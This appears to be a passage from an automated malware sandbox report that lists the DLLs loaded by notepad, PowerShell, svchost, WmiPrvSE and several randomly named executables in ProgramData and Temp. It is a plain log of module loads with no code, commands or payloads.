Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: version.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: rasman.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: secur32.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: schannel.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: mskeyprotect.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: ntasn1.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: ncrypt.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: ncryptsslp.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\SVrB5SO0.exe	Section loaded: pdh.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\cZp98.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
